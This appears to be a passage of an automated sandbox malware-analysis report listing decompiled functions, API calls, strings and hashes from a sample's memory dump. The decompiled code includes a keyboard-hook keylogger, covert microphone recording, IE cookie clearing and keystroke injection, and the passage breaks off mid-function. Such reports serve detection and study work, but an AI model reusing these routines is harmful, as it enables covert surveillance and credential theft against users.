                Similarity
                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                • String ID: .part
                • API String ID: 1303771098-3499674018
                • Opcode ID: c1f8b3c5b868d065d82fa0cba3452d5e8800a2f86f6f1877546f0846b4ec2f4f
                • Instruction ID: e251a7d4a1aabd80805b5d7196bb96980f3888c3ff40e4c14fed717d8046ce17
                • Opcode Fuzzy Hash: c1f8b3c5b868d065d82fa0cba3452d5e8800a2f86f6f1877546f0846b4ec2f4f
                • Instruction Fuzzy Hash: FE318571508301AFC210EB61DC859AFB7ECEB94355F40493FF945A21D2DB78EA488B9A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040B463 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E0040B463(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t64;

				_t42 =  &_v28;
				E004020BF(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E0041288E( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t64 = _t63 + 0xc;
				E00401FC2( &_v28, 0x80000001, _t60, _t17);
				E00401FB8();
				_t59 = 0x464074;
				_t20 = E00405AE5(0x464074);
				_t68 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00401F8B( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402073(0,  &_v52, 0x464074, _t62,  &_v340);
						_t59 =  &_v52;
						_t34 = E0041AC0A(E00401EE4(E0041A7B9( &_v76,  &_v52)),  &_v52);
						E00401EE9();
						E00401FB8();
						__eflags = _t34;
						if(__eflags == 0) {
							__eflags = E00406155(0x473950, "XP", 0);
							if(__eflags != 0) {
								_t41 = 1;
								E00402073(1, _t64 - 0x18,  &_v52, _t62, "\n[IE cookies cleared!]");
								E0040B752(1,  &_v52, _t62, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t64 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t64 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402073(_t41, _t48, _t59, _t62);
					E0040B752(_t41, _t59, _t62, _t68);
					_t41 = 1;
					L8:
				}
				E00401FB8();
				return _t41;
			}





















                0x0040b46c
                0x0040b471
                0x0040b476
                0x0040b489
                0x0040b48b
                0x0040b490
                0x0040b497
                0x0040b49f
                0x0040b4a4
                0x0040b4ac
                0x0040b4b1
                0x0040b4b3
                0x0040b4e5
                0x0040b4f8
                0x0040b4fa
                0x00000000
                0x0040b4fc
                0x0040b506
                0x0040b50b
                0x0040b51f
                0x0040b529
                0x0040b531
                0x0040b536
                0x0040b538
                0x0040b559
                0x0040b55b
                0x0040b560
                0x0040b569
                0x0040b56e
                0x00000000
                0x0040b56e
                0x0040b53a
                0x0040b53d
                0x0040b53f
                0x00000000
                0x0040b53f
                0x0040b538
                0x0040b4b5
                0x0040b4b5
                0x0040b4b8
                0x0040b4ba
                0x0040b4bf
                0x0040b4bf
                0x0040b4c4
                0x0040b4c9
                0x0040b573
                0x0040b573
                0x0040b579
                0x0040b585

                APIs
                  • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                  • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                  • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B4E5
                • PathFileExistsA.SHLWAPI(?), ref: 0040B4F2
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P9G$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                • API String ID: 1133728706-1387963244
                • Opcode ID: 8dfa34e795b2460f711c9433afd99fad6450ed803a30207b2e654047f2334ff6
                • Instruction ID: ea656425d40d7a45f5e056d43768dd8003def9e5f0b6d0ab8c53a167709f9c7c
                • Opcode Fuzzy Hash: 8dfa34e795b2460f711c9433afd99fad6450ed803a30207b2e654047f2334ff6
                • Instruction Fuzzy Hash: DB214F31A402096ACB04F7E1DD96EEE77689E51708F40017FB901772C2EB7C9A45C6DE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BC9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00401BC9(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;

				_t35 = __eflags;
				CreateDirectoryW(E00401EE4(0x472d40), 0);
				_t3 = 8;
				 *0x470ab6 = _t3;
				 *0x470aac = 0x1f40;
				 *0x470ab0 = 0x1f40;
				0x470aa8->wFormatTag = 1;
				 *0x470aaa = 1;
				 *0x470ab4 = 1;
				 *0x470ab8 = 0;
				_t7 = E0043A3AC(_t5, E00401F8B(E00401E45(0x473298, 1, _t33, _t35, 0x24)));
				_t24 =  *0x470aac; // 0x0
				 *_t34 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x470abc = _t25;
				 *0x470ac4 = (( *0x470ab6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x470ac0, 0xffffffff, 0x470aa8, E00401CEB, 0, ??);
				E00401F7D( *0x470ac4);
				0x470a88->lpData = E00401F8B(0x472d58);
				_t15 =  *0x470ac4; // 0x0
				 *0x470a8c = _t15;
				 *0x470a90 = 0;
				 *0x470a94 = 0;
				 *0x470a98 = 0;
				 *0x470a9c = 0;
				waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
				waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
				waveInStart( *0x470ac0);
				return 0;
			}











                0x00401bc9
                0x00401bd9
                0x00401be1
                0x00401be7
                0x00401bef
                0x00401bf6
                0x00401bfe
                0x00401c0c
                0x00401c13
                0x00401c1a
                0x00401c2d
                0x00401c32
                0x00401c3b
                0x00401c4d
                0x00401c64
                0x00401c6a
                0x00401c6f
                0x00401c82
                0x00401c95
                0x00401c9a
                0x00401ca6
                0x00401cab
                0x00401cb1
                0x00401cb7
                0x00401cbd
                0x00401cc3
                0x00401cd2
                0x00401cde
                0x00401ce8

                APIs
                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                • waveInOpen.WINMM(00470AC0,000000FF,00470AA8,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401CC3
                • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401CD2
                • waveInStart.WINMM ref: 00401CDE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                • String ID: @-G$X-G
                • API String ID: 1356121797-233566475
                • Opcode ID: 555486e1d5cfe24e7a994e895008b2a4ca36706a3805184ddfe35c63d73dbc88
                • Instruction ID: d9f75f8a904554b1551795dc4e374556cb90ebe8a53537c147534bfad38ff794
                • Opcode Fuzzy Hash: 555486e1d5cfe24e7a994e895008b2a4ca36706a3805184ddfe35c63d73dbc88
                • Instruction Fuzzy Hash: 5C213771616300DBC754AFAAFC09A6A7BA9EBB5315F00843EB10DD76F1DBB844818B5C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004098BB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                Download Yara Rule
                C-Code - Quality: 91%
                			E004098BB(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				void* __ebp;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				void* _t36;
				signed int _t37;
				void* _t39;

				_t39 = (_t37 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x470b24 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E004098A7, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t44 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E0041A6E9(_t22,  &_v60, GetLastError());
						_t40 = _t39 - 0x18;
						E004052DD(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
						E00402073(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
						E0041A04A(_t22, 0);
						E00401FB8();
						_t8 = 1;
					}
				}
				return _t8;
			}

















                0x004098c1
                0x004098c5
                0x004098ca
                0x004098d2
                0x00000000
                0x004098d4
                0x004098e4
                0x004098ea
                0x004098ec
                0x004098ee
                0x00409936
                0x00409936
                0x0040993e
                0x00409944
                0x00409946
                0x00000000
                0x00000000
                0x0040994d
                0x00409958
                0x0040995e
                0x00409960
                0x00000000
                0x00000000
                0x00000000
                0x00409960
                0x00409962
                0x00409962
                0x004098f0
                0x004098fc
                0x00409901
                0x0040990c
                0x0040991b
                0x00409920
                0x0040992c
                0x00409933
                0x00409933
                0x004098ee
                0x00409969

                APIs
                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004098D6
                • SetWindowsHookExA.USER32 ref: 004098E4
                • GetLastError.KERNEL32 ref: 004098F0
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                • GetMessageA.USER32 ref: 0040993E
                • TranslateMessage.USER32(?), ref: 0040994D
                • DispatchMessageA.USER32 ref: 00409958
                Strings
                • Keylogger initialization failure: error , xrefs: 00409904
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                • String ID: Keylogger initialization failure: error
                • API String ID: 3219506041-952744263
                • Opcode ID: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                • Instruction ID: c40f6cef292aa3bb57f49984c9f8b97dc6da6adf0f265d4e9e2bb6cec8c4e7f3
                • Opcode Fuzzy Hash: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                • Instruction Fuzzy Hash: E81154726053016BC7107B76EC0A86B77ECDB95715F10467EF891E22A2EB38D940C76A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004494C9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 69%
                			E004494C9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46f00c; // 0xd60a1515
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00444FE6(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E004338BB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00434713(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00447433(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00434713(_t101);
									goto L36;
								}
								_t62 = E00447433(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00434713(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00444A38(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00455A90();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00447433(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00444A38(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00455A90();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                0x004494ce
                0x004494cf
                0x004494d0
                0x004494d7
                0x004494db
                0x004494dc
                0x004494e2
                0x004494e8
                0x004494ee
                0x004494f1
                0x004494f1
                0x004494f4
                0x004494f6
                0x004494f6
                0x004494f4
                0x004494f8
                0x004494fd
                0x00449504
                0x00449507
                0x00449507
                0x00449523
                0x00449529
                0x0044952e
                0x004496c1
                0x004496d4
                0x00449534
                0x00449534
                0x00449537
                0x0044953c
                0x00449540
                0x00449594
                0x00449594
                0x00449596
                0x00449598
                0x004496b6
                0x004496b6
                0x004496b8
                0x004496b9
                0x00000000
                0x004496bf
                0x004495a9
                0x004495af
                0x004495b1
                0x00000000
                0x00000000
                0x004495b7
                0x004495c9
                0x004495ce
                0x004495d2
                0x00000000
                0x00000000
                0x004495df
                0x00449619
                0x0044961c
                0x0044961f
                0x00449621
                0x00449623
                0x00449625
                0x00449671
                0x00449671
                0x00449673
                0x00449673
                0x00449675
                0x004496af
                0x004496b0
                0x00000000
                0x004496b5
                0x00449689
                0x0044968e
                0x00449690
                0x00000000
                0x00000000
                0x00449694
                0x00449695
                0x00449696
                0x00449699
                0x004496d5
                0x004496d8
                0x0044969b
                0x0044969b
                0x0044969c
                0x0044969c
                0x004496a9
                0x004496ab
                0x004496ad
                0x004496de
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004496ad
                0x00449627
                0x0044962a
                0x0044962c
                0x0044962e
                0x00449630
                0x00449633
                0x00449638
                0x00449653
                0x00449655
                0x0044965f
                0x00449661
                0x00449662
                0x00449664
                0x00000000
                0x00000000
                0x00449666
                0x0044966c
                0x0044966c
                0x00000000
                0x0044966c
                0x0044963a
                0x0044963c
                0x00449640
                0x00449645
                0x00449647
                0x00449649
                0x00000000
                0x00000000
                0x0044964b
                0x00000000
                0x0044964b
                0x004495e1
                0x004495e6
                0x00000000
                0x00000000
                0x004495ec
                0x004495ee
                0x00000000
                0x00000000
                0x00449605
                0x0044960a
                0x0044960e
                0x00000000
                0x00000000
                0x00000000
                0x00449614
                0x00449547
                0x00449549
                0x0044954b
                0x00449553
                0x00449572
                0x00449574
                0x0044957e
                0x00449580
                0x00449581
                0x00449583
                0x00000000
                0x00000000
                0x00449589
                0x0044958f
                0x0044958f
                0x00000000
                0x0044958f
                0x00449557
                0x0044955b
                0x00449560
                0x00449564
                0x00000000
                0x00000000
                0x0044956a
                0x00000000
                0x0044956a

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 00449523
                • __alloca_probe_16.LIBCMT ref: 0044955B
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 004495A9
                • __alloca_probe_16.LIBCMT ref: 00449640
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004496A3
                • __freea.LIBCMT ref: 004496B0
                  • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                • __freea.LIBCMT ref: 004496B9
                • __freea.LIBCMT ref: 004496DE
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 3864826663-0
                • Opcode ID: 9f70c11f76ab57f902672a967c00ed4b2c564638ce67ce0a9dbf457e697ef647
                • Instruction ID: 16b5e23e06f44e8f5b9cde4bfd472c7b38c402739d6472c7ebbca8c933d1a93d
                • Opcode Fuzzy Hash: 9f70c11f76ab57f902672a967c00ed4b2c564638ce67ce0a9dbf457e697ef647
                • Instruction Fuzzy Hash: C7510572A00216AFFB259F65CC81EBF77A9EB44750F16462EFC05D7240EB38DC50A698
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004184EE Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                Download Yara Rule
                APIs
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00418527
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418548
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418568
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041857C
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418592
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185AF
                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185CA
                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004185E6
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: InputSend
                • String ID:
                • API String ID: 3431551938-0
                • Opcode ID: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                • Instruction ID: 0947e47258becacd92e061a94fe1ad349a6366cffbcd8e1d8fee47d4855f6fd4
                • Opcode Fuzzy Hash: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                • Instruction Fuzzy Hash: 9C318131558309BEE311CF51DD41BEBBBDCEF98B54F00080FF6808A191D6A695C98BA7
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00445DF1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 87%
                			E00445DF1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x46f00c; // 0xd60a1515
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E004470EB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E0044722D(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E00434713(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E004338BB(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t84 =  &_v52; // 0x446368
												_t98 = E004451BB(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E0043EEAD())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
